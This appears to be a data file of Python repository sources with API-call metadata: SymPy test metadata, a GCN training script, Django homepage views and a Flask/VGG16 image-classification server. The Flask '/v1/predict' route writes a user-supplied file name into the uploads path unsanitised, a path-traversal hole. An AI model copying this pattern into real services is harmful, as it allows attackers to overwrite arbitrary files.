pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((152, 11, 152, 31), 'sympy.solvers.pde.checkpdesol', 'checkpdesol', ({(152, 23, 152, 25): 'eq', (152, 27, 152, 30): 'sol'}, {}), '(eq, sol)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((156, 11, 156, 31), 'sympy.solvers.pde.checkpdesol', 'checkpdesol', ({(156, 23, 156, 25): 'eq', (156, 27, 156, 30): 'sol'}, {}), '(eq, sol)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((162, 44, 162, 56), 'sympy.exp', 'exp', ({(162, 48, 162, 55): '(x + 3 * y)'}, {}), '(x + 3 * y)', False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((166, 11, 166, 27), 'sympy.solvers.pde.classify_pde', 'classify_pde', ({(166, 24, 166, 26): 'eq'}, {}), '(eq)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((168, 11, 168, 31), 'sympy.solvers.pde.checkpdesol', 'checkpdesol', ({(168, 23, 168, 25): 'eq', (168, 27, 168, 30): 'sol'}, {}), '(eq, sol)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((173, 11, 173, 27), 'sympy.solvers.pde.classify_pde', 'classify_pde', ({(173, 24, 173, 26): 'eq'}, {}), '(eq)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((175, 11, 175, 31), 'sympy.solvers.pde.checkpdesol', 'checkpdesol', ({(175, 23, 175, 25): 'eq', (175, 27, 175, 30): 'sol'}, {}), '(eq, sol)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((177, 42, 177, 48), 'sympy.sin', 'sin', ({(177, 46, 177, 47): 'x'}, {}), '(x)', False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((181, 11, 181, 27), 'sympy.solvers.pde.classify_pde', 'classify_pde', ({(181, 24, 181, 26): 'eq'}, {}), '(eq)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((183, 11, 183, 31), 'sympy.solvers.pde.checkpdesol', 'checkpdesol', ({(183, 23, 183, 25): 'eq', (183, 27, 183, 30): 'sol'}, {}), '(eq, sol)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((189, 11, 189, 27), 'sympy.solvers.pde.classify_pde', 'classify_pde', ({(189, 24, 189, 26): 'eq'}, {}), '(eq)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((191, 11, 191, 31), 'sympy.solvers.pde.checkpdesol', 'checkpdesol', ({(191, 23, 191, 25): 'eq', (191, 27, 191, 30): 'sol'}, {}), '(eq, sol)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((192, 37, 192, 43), 'sympy.log', 'log', ({(192, 41, 192, 42): 'x'}, {}), '(x)', False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((193, 11, 193, 27), 'sympy.solvers.pde.classify_pde', 'classify_pde', ({(193, 24, 193, 26): 'eq'}, {}), '(eq)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((217, 11, 217, 31), 'sympy.solvers.pde.checkpdesol', 'checkpdesol', ({(217, 23, 217, 25): 'eq', (217, 27, 217, 30): 'sol'}, {}), '(eq, sol)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((222, 11, 222, 31), 'sympy.solvers.pde.checkpdesol', 'checkpdesol', ({(222, 23, 222, 25): 'eq', (222, 27, 222, 30): 'sol'}, {}), '(eq, sol)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((227, 11, 227, 31), 'sympy.solvers.pde.checkpdesol', 'checkpdesol', ({(227, 23, 227, 25): 'eq', (227, 27, 227, 30): 'sol'}, {}), '(eq, sol)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((232, 11, 232, 31), 'sympy.solvers.pde.checkpdesol', 'checkpdesol', ({(232, 23, 232, 25): 'eq', (232, 27, 232, 30): 'sol'}, {}), '(eq, sol)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((99, 15, 99, 31), 'sympy.solvers.pde.classify_pde', 'classify_pde', ({(99, 28, 99, 30): 'eq'}, {}), '(eq)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((101, 15, 101, 31), 'sympy.solvers.pde.classify_pde', 'classify_pde', ({(101, 28, 101, 30): 'eq'}, {}), '(eq)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((122, 8, 122, 52), 'sympy.solvers.pde.checkpdesol', 'checkpdesol', (), '', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((170, 46, 170, 56), 'sympy.exp', 'exp', ({(170, 50, 170, 55): '(x + y)'}, {}), '(x + y)', False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((110, 31, 110, 42), 'sympy.solvers.pde.pdsolve', 'pdsolve', ({(110, 39, 110, 41): 'eq'}, {}), '(eq)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((114, 29, 114, 41), 'sympy.solvers.pde.pdsolve', 'pdsolve', ({(114, 37, 114, 40): 'eq5'}, {}), '(eq5)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((114, 43, 114, 55), 'sympy.solvers.pde.pdsolve', 'pdsolve', ({(114, 51, 114, 54): 'eq6'}, {}), '(eq6)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((118, 31, 118, 42), 'sympy.solvers.pde.pdsolve', 'pdsolve', ({(118, 39, 118, 41): 'eq'}, {}), '(eq)', False, 'from sympy.solvers.pde import pde_separate, pde_separate_add, pde_separate_mul, pdsolve, classify_pde, checkpdesol\n'), ((128, 48, 128, 63), 'sympy.exp', 'exp', ({(128, 52, 128, 62): '(-x / 2 - y / 2)'}, {}), '(-x / 2 - y / 2)', False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((129, 60, 129, 75), 'sympy.exp', 'exp', ({(129, 64, 129, 74): '(-x / 2 - y / 2)'}, {}), '(-x / 2 - y / 2)', False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((130, 60, 130, 75), 'sympy.exp', 'exp', ({(130, 64, 130, 74): '(-x / 2 - y / 2)'}, {}), '(-x / 2 - y / 2)', False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((139, 33, 139, 44), 'sympy.exp', 'exp', ({(139, 37, 139, 43): '(-x - y)'}, {}), '(-x - y)', False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((165, 46, 165, 53), 'sympy.exp', 'exp', ({(165, 50, 165, 52): '(-y)'}, {}), '(-y)', False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((221, 37, 221, 49), 'sympy.exp', 'exp', ({(221, 41, 221, 48): '(-x ** 2 / 2)'}, {}), '(-x ** 2 / 2)', False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((226, 39, 226, 51), 'sympy.exp', 'exp', ({(226, 43, 226, 50): '(-x ** 3 / 3)'}, {}), '(-x ** 3 / 3)', False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((229, 9, 229, 15), 'sympy.exp', 'exp', ({(229, 13, 229, 14): 'x'}, {}), '(x)', False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((234, 9, 234, 17), 'sympy.exp', 'exp', ({(234, 13, 234, 16): '(2 * x)'}, {}), '(2 * x)', False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((172, 39, 172, 54), 'sympy.exp', 'exp', ({(172, 43, 172, 53): '(-x / 2 - y / 2)'}, {}), '(-x / 2 - y / 2)', False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((172, 57, 172, 67), 'sympy.exp', 'exp', ({(172, 61, 172, 66): '(x + y)'}, {}), '(x + y)', False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((180, 52, 180, 58), 'sympy.cos', 'cos', ({(180, 56, 180, 57): 'x'}, {}), '(x)', False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((216, 31, 216, 42), 'sympy.exp', 'exp', ({(216, 35, 216, 41): '(y ** 2 / 2)'}, {}), '(y ** 2 / 2)', False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((165, 18, 165, 26), 'sympy.exp', 'exp', ({(165, 22, 165, 25): '(x / 2)'}, {}), '(x / 2)', False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((165, 29, 165, 41), 'sympy.exp', 'exp', ({(165, 33, 165, 40): '(x + 4 * y)'}, {}), '(x + 4 * y)', False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((180, 20, 180, 36), 'sympy.exp', 'exp', ({(180, 24, 180, 35): '(x / 5 - 3 * y / 5)'}, {}), '(x / 5 - 3 * y / 5)', False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((221, 28, 221, 35), 'sympy.exp', 'exp', ({(221, 32, 221, 34): '(-x)'}, {}), '(-x)', False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((231, 26, 231, 35), 'sympy.exp', 'exp', ({(231, 30, 231, 34): '(-2 * x)'}, {}), '(-2 * x)', False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((151, 46, 151, 51), 'sympy.core.S', 'S', ({(151, 48, 151, 50): '(85)'}, {}), '(85)', False, 'from sympy.core import S\n'), ((151, 58, 151, 63), 'sympy.core.S', 'S', ({(151, 60, 151, 62): '(85)'}, {}), '(85)', False, 'from sympy.core import S\n'), ((180, 41, 180, 47), 'sympy.sin', 'sin', ({(180, 45, 180, 46): 'x'}, {}), '(x)', False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((236, 44, 236, 53), 'sympy.exp', 'exp', ({(236, 48, 236, 52): '(-2 * x)'}, {}), '(-2 * x)', False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((115, 42, 115, 46), 'sympy.core.S', 'S', ({(115, 44, 115, 45): '(5)'}, {}), '(5)', False, 'from sympy.core import S\n'), ((115, 53, 115, 57), 'sympy.core.S', 'S', ({(115, 55, 115, 56): '(5)'}, {}), '(5)', False, 'from sympy.core import S\n'), ((116, 43, 116, 48), 'sympy.core.S', 'S', ({(116, 45, 116, 47): '(10)'}, {}), '(10)', False, 'from sympy.core import S\n'), ((116, 55, 116, 60), 'sympy.core.S', 'S', ({(116, 57, 116, 59): '(10)'}, {}), '(10)', False, 'from sympy.core import S\n'), ((145, 55, 145, 59), 'sympy.core.S', 'S', ({(145, 57, 145, 58): '(8)'}, {}), '(8)', False, 'from sympy.core import S\n'), ((188, 55, 188, 70), 'sympy.exp', 'exp', ({(188, 59, 188, 69): '(-x / 2 - y / 2)'}, {}), '(-x / 2 - y / 2)', False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((208, 54, 208, 69), 'sympy.exp', 'exp', ({(208, 58, 208, 68): '(-x / 2 - y / 2)'}, {}), '(-x / 2 - y / 2)', False, 'from sympy import Derivative as D, Eq, exp, sin, Function, Symbol, symbols, cos, log\n'), ((145, 42, 145, 47), 'sympy.core.S', 'S', ({(145, 44, 145, 46): '(12)'}, {}), '(12)', False, 'from sympy.core import S\n')] |
EasternJournalist/learn-deep-learning | GCN/GCN.py | cc424713ffc57b8a796ebd81354a1b887f9c5092 | import torch
import torch.nn.functional as F
import pandas as pd
import numpy as np
from torch_geometric.data import Data
from torch_geometric.nn import GCNConv, PairNorm
from torch_geometric.utils.undirected import to_undirected
import random
import matplotlib.pyplot as plt
data_name = 'citeseer' # 'cora' or 'citeseer'
data_edge_path = f'datasets/{data_name}/{data_name}.cites'
data_content_path = f'datasets/{data_name}/{data_name}.content'
raw_content = pd.read_table(data_content_path, header=None, dtype={0:np.str})
raw_edge = pd.read_table(data_edge_path, header=None, dtype=np.str)
paper_ids = raw_content[0]
paper_id_map = {}
for i, pp_id in enumerate(paper_ids):
paper_id_map[pp_id] = i
edge_index = torch.from_numpy(raw_edge.apply(lambda col: col.map(paper_id_map)).dropna().values).long().t().contiguous()
x = torch.from_numpy(raw_content.values[:, 1:-1].astype(np.float)).float()
labels = np.unique(raw_content[raw_content.keys()[-1]]).tolist()
y = torch.from_numpy(raw_content[raw_content.keys()[-1]].map(lambda x: labels.index(x)).values).long()
def get_mask(y:torch.tensor):
train_mask = torch.tensor([False] * y.shape[0])
for i in torch.unique(y).unbind():
temp = torch.arange(0, y.shape[0])[y == i].tolist()
random.shuffle(temp)
train_mask[temp[:30]] = True
train_mask = torch.tensor(train_mask)
test_mask = train_mask == False
return train_mask, test_mask
train_mask, test_mask = get_mask(y)
data = Data(x=x, edge_index=edge_index, y=y, train_mask=train_mask, test_mask=test_mask)
def drop_edge(edge_index, keep_ratio:float=1.):
num_keep = int(keep_ratio * edge_index.shape[1])
temp = [True] * num_keep + [False] * (edge_index.shape[1] - num_keep)
random.shuffle(temp)
return edge_index[:, temp]
class GCNNodeClassifier(torch.nn.Module):
def __init__(self,
dim_features,
num_classes,
num_layers,
add_self_loops:bool=True,
use_pairnorm:bool=False,
drop_edge:float=1.,
activation:str='relu',
undirected:bool=False
):
super(GCNNodeClassifier, self).__init__()
dim_hidden = 32
self.gconvs = torch.nn.ModuleList(
[GCNConv(in_channels=dim_features, out_channels=dim_hidden, add_self_loops=add_self_loops)]
+ [GCNConv(in_channels=dim_hidden, out_channels=dim_hidden, add_self_loops=add_self_loops) for i in range(num_layers - 2)]
)
self.final_conv = GCNConv(in_channels=dim_hidden, out_channels=num_classes, add_self_loops=add_self_loops)
self.use_pairnorm = use_pairnorm
if self.use_pairnorm:
self.pairnorm = PairNorm()
self.drop_edge = drop_edge
activations_map = {'relu':torch.relu, 'tanh':torch.tanh, 'sigmoid':torch.sigmoid, 'leaky_relu':torch.nn.LeakyReLU(0.1)}
self.activation_fn = activations_map[activation]
def forward(self, x, edge_index):
for l in self.gconvs:
edges = drop_edge(edge_index, self.drop_edge)
x = l(x, edges)
if self.use_pairnorm:
x = self.pairnorm(x)
x = self.activation_fn(x)
x = self.final_conv(x, edge_index)
return x
def eval_acc(y_pred, y):
return ((torch.argmax(y_pred, dim=-1) == y).float().sum() / y.shape[0]).item()
num_epochs = 100
test_cases = [
{'num_layers':2, 'add_self_loops':True, 'use_pairnorm':False, 'drop_edge':1., 'activation':'relu', 'undirected':False},
# num layers
{'num_layers':4, 'add_self_loops':True, 'use_pairnorm':False, 'drop_edge':1., 'activation':'relu', 'undirected':False},
{'num_layers':6, 'add_self_loops':True, 'use_pairnorm':False, 'drop_edge':1., 'activation':'relu', 'undirected':False},
# self loop
{'num_layers':2, 'add_self_loops':False, 'use_pairnorm':False, 'drop_edge':1., 'activation':'relu', 'undirected':False},
# pair norm
{'num_layers':2, 'add_self_loops':True, 'use_pairnorm':True, 'drop_edge':1., 'activation':'relu', 'undirected':False},
{'num_layers':4, 'add_self_loops':True, 'use_pairnorm':True, 'drop_edge':1., 'activation':'relu', 'undirected':False},
{'num_layers':6, 'add_self_loops':True, 'use_pairnorm':True, 'drop_edge':1., 'activation':'relu', 'undirected':False},
# drop edge
{'num_layers':2, 'add_self_loops':True, 'use_pairnorm':False, 'drop_edge':0.6, 'activation':'relu', 'undirected':False},
{'num_layers':4, 'add_self_loops':True, 'use_pairnorm':False, 'drop_edge':0.6, 'activation':'relu', 'undirected':False},
# activation fn
{'num_layers':2, 'add_self_loops':True, 'use_pairnorm':False, 'drop_edge':1., 'activation':'tanh', 'undirected':False},
{'num_layers':2, 'add_self_loops':True, 'use_pairnorm':False, 'drop_edge':1., 'activation':'leaky_relu', 'undirected':False},
# undirected
{'num_layers':2, 'add_self_loops':True, 'use_pairnorm':False, 'drop_edge':1., 'activation':'relu', 'undirected':True},
{'num_layers':4, 'add_self_loops':True, 'use_pairnorm':True, 'drop_edge':1., 'activation':'relu', 'undirected':True},
{'num_layers':4, 'add_self_loops':True, 'use_pairnorm':False, 'drop_edge':0.8, 'activation':'relu', 'undirected':True},
]
for i_case, kwargs in enumerate(test_cases):
print(f'Test Case {i_case:>2}')
model = GCNNodeClassifier(x.shape[1], len(labels), **kwargs)
optimizer = torch.optim.Adam(model.parameters(), lr=1e-3)
history_test_acc = []
input_edge_index = to_undirected(edge_index) if kwargs['undirected'] else edge_index
for i_epoch in range(0, num_epochs):
print(f'Epoch {i_epoch:>3} ', end='')
y_pred = model(x, input_edge_index)
train_acc = eval_acc(y_pred[train_mask], y[train_mask])
# Train
loss = F.cross_entropy(y_pred[train_mask], y[train_mask])
optimizer.zero_grad()
loss.backward()
optimizer.step()
# Test
test_acc = eval_acc(y_pred[test_mask], y[test_mask])
history_test_acc.append(test_acc)
print(f'Train Acc = {train_acc}. Test Acc = {test_acc}')
kwargs['best_acc'] = max(history_test_acc)
plt.plot(list(range(num_epochs)), history_test_acc, label=f'case_{str(i_case).zfill(2)}')
plt.legend()
plt.savefig(f'{data_name}-HistoryAcc.jpg')
pd.DataFrame(test_cases).to_csv(f'{data_name}-Result.csv')
| [((15, 14, 15, 77), 'pandas.read_table', 'pd.read_table', (), '', True, 'import pandas as pd\n'), ((16, 11, 16, 67), 'pandas.read_table', 'pd.read_table', (), '', True, 'import pandas as pd\n'), ((41, 7, 41, 88), 'torch_geometric.data.Data', 'Data', (), '', False, 'from torch_geometric.data import Data\n'), ((140, 0, 140, 12), 'matplotlib.pyplot.legend', 'plt.legend', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((141, 0, 141, 42), 'matplotlib.pyplot.savefig', 'plt.savefig', ({(141, 12, 141, 41): 'f"""{data_name}-HistoryAcc.jpg"""'}, {}), "(f'{data_name}-HistoryAcc.jpg')", True, 'import matplotlib.pyplot as plt\n'), ((30, 17, 30, 51), 'torch.tensor', 'torch.tensor', ({(30, 30, 30, 50): '[False] * y.shape[0]'}, {}), '([False] * y.shape[0])', False, 'import torch\n'), ((36, 17, 36, 41), 'torch.tensor', 'torch.tensor', ({(36, 30, 36, 40): 'train_mask'}, {}), '(train_mask)', False, 'import torch\n'), ((46, 4, 46, 24), 'random.shuffle', 'random.shuffle', ({(46, 19, 46, 23): 'temp'}, {}), '(temp)', False, 'import random\n'), ((33, 8, 33, 28), 'random.shuffle', 'random.shuffle', ({(33, 23, 33, 27): 'temp'}, {}), '(temp)', False, 'import random\n'), ((67, 26, 67, 114), 'torch_geometric.nn.GCNConv', 'GCNConv', (), '', False, 'from torch_geometric.nn import GCNConv, PairNorm\n'), ((120, 23, 120, 48), 'torch_geometric.utils.undirected.to_undirected', 'to_undirected', ({(120, 37, 120, 47): 'edge_index'}, {}), '(edge_index)', False, 'from torch_geometric.utils.undirected import to_undirected\n'), ((128, 15, 128, 65), 'torch.nn.functional.cross_entropy', 'F.cross_entropy', ({(128, 31, 128, 49): 'y_pred[train_mask]', (128, 51, 128, 64): 'y[train_mask]'}, {}), '(y_pred[train_mask], y[train_mask])', True, 'import torch.nn.functional as F\n'), ((142, 0, 142, 24), 'pandas.DataFrame', 'pd.DataFrame', ({(142, 13, 142, 23): 'test_cases'}, {}), '(test_cases)', True, 'import pandas as pd\n'), ((31, 13, 31, 28), 'torch.unique', 'torch.unique', ({(31, 26, 31, 27): 'y'}, {}), '(y)', False, 'import torch\n'), ((71, 28, 71, 38), 'torch_geometric.nn.PairNorm', 'PairNorm', ({}, {}), '()', False, 'from torch_geometric.nn import GCNConv, PairNorm\n'), ((73, 103, 73, 126), 'torch.nn.LeakyReLU', 'torch.nn.LeakyReLU', ({(73, 122, 73, 125): '(0.1)'}, {}), '(0.1)', False, 'import torch\n'), ((32, 15, 32, 42), 'torch.arange', 'torch.arange', ({(32, 28, 32, 29): '0', (32, 31, 32, 41): 'y.shape[0]'}, {}), '(0, y.shape[0])', False, 'import torch\n'), ((64, 13, 64, 102), 'torch_geometric.nn.GCNConv', 'GCNConv', (), '', False, 'from torch_geometric.nn import GCNConv, PairNorm\n'), ((65, 15, 65, 102), 'torch_geometric.nn.GCNConv', 'GCNConv', (), '', False, 'from torch_geometric.nn import GCNConv, PairNorm\n'), ((88, 13, 88, 41), 'torch.argmax', 'torch.argmax', (), '', False, 'import torch\n')] |
ESG-Leipzig/Homepage-2015 | esg_leipzig_homepage_2015/views.py | 6b77451881031dcb640d2e61ce862617d634f9ac | import datetime
import json
from django.conf import settings
from django.http import Http404
from django.utils import timezone
from django.views import generic
from .models import Event, FlatPage, News
class HomeView(generic.ListView):
"""
View for the first page called 'Home'.
"""
context_object_name = 'event_list'
model = Event
template_name = 'home.html'
def get_queryset(self):
"""
Returns a queryset of all future events that should appear on home.
Uses settings.EVENT_DELAY_IN_MINUTES to determine the range.
"""
time_to_hide = timezone.now() - datetime.timedelta(
minutes=settings.EVENT_DELAY_IN_MINUTES)
queryset = super().get_queryset().filter(begin__gte=time_to_hide)
result = []
for event in queryset:
time_to_show = timezone.now() + datetime.timedelta(
days=event.on_home_before_begin)
if event.on_home_before_begin > 0 and event.begin <= time_to_show:
result.append(event)
return result
def get_context_data(self, **context):
"""
Adds all news to the context.
"""
news_list = News.objects.all()
return super().get_context_data(news_list=news_list, **context)
class CalendarView(generic.ListView):
"""
View for a calendar with all events.
"""
model = Event
template_name = 'calendar.html'
def get_context_data(self, **context):
"""
Returns the template context. Adds event data as JSON for use in
Javascript calendar.
"""
context = super().get_context_data(**context)
event_list = []
for event in context['event_list']:
event_dict = {
'title': event.title,
'start': event.begin.isoformat(),
'description': event.content,
'className': event.css_class_name}
if event.duration:
event_dict['end'] = event.end.isoformat()
event_list.append(event_dict)
context['event_list_json'] = json.dumps(event_list)
return context
class FlatPageView(generic.DetailView):
"""
View for static pages.
"""
model = FlatPage
def get_object(self, queryset=None):
"""
Returns the flatpage instance. Raises Http404 if inexistent.
"""
queryset = queryset or self.get_queryset()
url = self.kwargs.get('url')
for flatpage in queryset.filter(slug=url.split('/')[-1]):
if flatpage.get_absolute_url().strip('/') == url:
obj = flatpage
break
else:
raise Http404
return obj
def get_template_names(self):
"""
Returns the template names for the view as list. The name
'flatpage_default.html' is always appended.
"""
template_names = []
if self.object.template_name:
template_names.append(self.object.template_name)
template_names.append('flatpage_default.html')
return template_names
def get_context_data(self, **context):
"""
Returns the template context. Adds breadcrumb to it if neccessary.
"""
context = super().get_context_data(**context)
parent = context['flatpage'].parent
if parent is None:
breadcrumb_list = []
else:
breadcrumb_list = [context['flatpage']]
while parent is not None:
breadcrumb_list.append(parent)
parent = parent.parent
breadcrumb_list.reverse()
context['breadcrumb_list'] = breadcrumb_list
return context
| [((67, 37, 67, 59), 'json.dumps', 'json.dumps', ({(67, 48, 67, 58): 'event_list'}, {}), '(event_list)', False, 'import json\n'), ((25, 23, 25, 37), 'django.utils.timezone.now', 'timezone.now', ({}, {}), '()', False, 'from django.utils import timezone\n'), ((25, 40, 26, 52), 'datetime.timedelta', 'datetime.timedelta', (), '', False, 'import datetime\n'), ((30, 27, 30, 41), 'django.utils.timezone.now', 'timezone.now', ({}, {}), '()', False, 'from django.utils import timezone\n'), ((30, 44, 31, 48), 'datetime.timedelta', 'datetime.timedelta', (), '', False, 'import datetime\n')] |
ronniechong/tensorflow-trainer | train.py | 79e58d224ce1e5ae687abee2bfd81deb49bd41dd | from dotenv import load_dotenv
load_dotenv()
from flask import Flask, flash, request, redirect, url_for
from flask_ngrok import run_with_ngrok
from flask_cors import CORS
from werkzeug.utils import secure_filename
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras.applications import vgg16
from tensorflow.keras import layers, models, Model, optimizers
from tensorflow.keras.preprocessing import image
import numpy as np
import os
import base64
ALLOWED_EXTENSIONS = {'txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'}
app = Flask(__name__)
app.secret_key = os.getenv('SECRETKEY')
CORS(app)
# run_with_ngrok(app)
# https://github.com/gstaff/flask-ngrok/issues/2
category_names = os.getenv('CATEGORIES').split(',')
nb_categories = len(category_names)
type = os.getenv('MODE')
if type == 'checkpoint':
# Load via checkpoints
img_height, img_width = 200,200
conv_base = vgg16.VGG16(weights='imagenet', include_top=False, pooling='max', input_shape = (img_width, img_height, 3))
layers = [
conv_base,
layers.Dense(nb_categories, activation='softmax')
]
model = models.Sequential(layers)
model.load_weights('./model/cp2-0010.ckpt')
else:
# Load saved model
model = models.load_model('./model/model_vgg16.h5')
def allowed_file(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS
@app.route('/')
def home():
return 'Nothing to see here'
@app.route('/v2/predict', methods=['POST'])
def predictFileUpload():
if request.method == 'POST':
print(request)
if 'file' not in request.files:
return {
'Error': 'No file part'
}
file = request.files['file']
if file.filename == '':
return {
'Error': 'No selected file'
}
if file and allowed_file(file.filename):
filename = secure_filename(file.filename)
file.save(os.path.join('./uploads', filename))
img_width, img_height = 200, 200
img = image.load_img(os.path.join('./uploads', filename), target_size = (img_width, img_height))
img = image.img_to_array(img)
img = np.expand_dims(img, axis = 0)
class_prob=model.predict(img)
y_pred = np.argmax(class_prob, axis=1)
count = 0
for a in class_prob[0]:
# print(category_names[count] + ': ' + "{:.2f}".format(a))
count = count + 1
return {
'filename': filename,
'prediction': category_names[y_pred[0]]
}
return 'nothing to see here'
@app.route('/v1/predict', methods=['POST'])
def predictBase64():
if request.method == 'POST':
data = request.get_json()
if data is None:
return {
'Error': 'No image'
}
else:
img_data = data['image']
filename = data['name']
with open(os.path.join('./uploads', filename), "wb") as fh:
fh.write(base64.decodebytes(img_data.encode()))
# fh.close()
img_width, img_height = 200, 200
img = image.load_img(os.path.join('./uploads', filename), target_size = (img_width, img_height))
img = image.img_to_array(img)
img = np.expand_dims(img, axis = 0)
class_prob=model.predict(img)
y_pred = np.argmax(class_prob, axis=1)
count = 0;
for a in class_prob[0]:
# print(category_names[count] + ': ' + "{:.2f}".format(a))
count = count + 1
return {
'filename': filename,
'prediction': category_names[y_pred[0]]
}
return 'nothing to see here'
if __name__ == '__main__':
app.run(host='0.0.0.0') | [((2, 0, 2, 13), 'dotenv.load_dotenv', 'load_dotenv', ({}, {}), '()', False, 'from dotenv import load_dotenv\n'), ((21, 6, 21, 21), 'flask.Flask', 'Flask', ({(21, 12, 21, 20): '__name__'}, {}), '(__name__)', False, 'from flask import Flask, flash, request, redirect, url_for\n'), ((22, 17, 22, 39), 'os.getenv', 'os.getenv', ({(22, 27, 22, 38): '"""SECRETKEY"""'}, {}), "('SECRETKEY')", False, 'import os\n'), ((23, 0, 23, 9), 'flask_cors.CORS', 'CORS', ({(23, 5, 23, 8): 'app'}, {}), '(app)', False, 'from flask_cors import CORS\n'), ((29, 7, 29, 24), 'os.getenv', 'os.getenv', ({(29, 17, 29, 23): '"""MODE"""'}, {}), "('MODE')", False, 'import os\n'), ((34, 14, 34, 121), 'tensorflow.keras.applications.vgg16.VGG16', 'vgg16.VGG16', (), '', False, 'from tensorflow.keras.applications import vgg16\n'), ((39, 10, 39, 35), 'tensorflow.keras.models.Sequential', 'models.Sequential', ({(39, 28, 39, 34): 'layers'}, {}), '(layers)', False, 'from tensorflow.keras import layers, models, Model, optimizers\n'), ((43, 10, 43, 53), 'tensorflow.keras.models.load_model', 'models.load_model', ({(43, 28, 43, 52): '"""./model/model_vgg16.h5"""'}, {}), "('./model/model_vgg16.h5')", False, 'from tensorflow.keras import layers, models, Model, optimizers\n'), ((26, 17, 26, 40), 'os.getenv', 'os.getenv', ({(26, 27, 26, 39): '"""CATEGORIES"""'}, {}), "('CATEGORIES')", False, 'import os\n'), ((37, 4, 37, 53), 'tensorflow.keras.layers.Dense', 'layers.Dense', (), '', False, 'from tensorflow.keras import layers, models, Model, optimizers\n'), ((90, 11, 90, 29), 'flask.request.get_json', 'request.get_json', ({}, {}), '()', False, 'from flask import Flask, flash, request, redirect, url_for\n'), ((105, 10, 105, 33), 'tensorflow.keras.preprocessing.image.img_to_array', 'image.img_to_array', ({(105, 29, 105, 32): 